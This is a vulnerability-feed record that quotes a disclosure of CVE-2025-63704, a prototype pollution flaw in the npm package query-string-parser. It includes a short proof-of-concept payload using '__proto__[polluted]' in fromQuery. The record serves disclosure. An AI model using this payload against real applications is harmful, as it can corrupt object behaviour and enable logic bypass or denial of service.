{"uuid": "087a794c-efd4-48a8-91a1-dd9455f587ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-63704", "type": "seen", "source": "https://gist.github.com/6en6ar/d62f614dbb2b1032b5e45a56fe26ec8b", "content": "Product: https://www.npmjs.com/package/query-string-parser\nVersion: v1.0.0\nVulnerability type: Prototype Pollution vulnerability inside query-string-parser through version 1.0.0\nCVE ID: CVE-2025-63704\nDiscovered: lelecolacola123, 6en6ar\n\nDescription: \nNPM package query-parser-string does not properly sanitize user supplied query parameters and merges them to the newly created object. \nThis happens inside _fillValue function inside index.js, when calling fromQuery to parse query parameters.\n\nPayload used:\n\n> const { toQuery, fromQuery } = require('query-string-parser')\n> const queryString = fromQuery(\"a=1&b=2&__proto__[polluted]=polluted\")\n> console.log(\"Query string object polluted: \"+queryString.__proto__.polluted)\n> console.log(\"POlluted object: \" + {}.polluted)\n> let obj = {}\n> console.log(\"Newly created obj: \" + obj.polluted)", "creation_timestamp": "2026-05-06T19:53:03.000000Z"}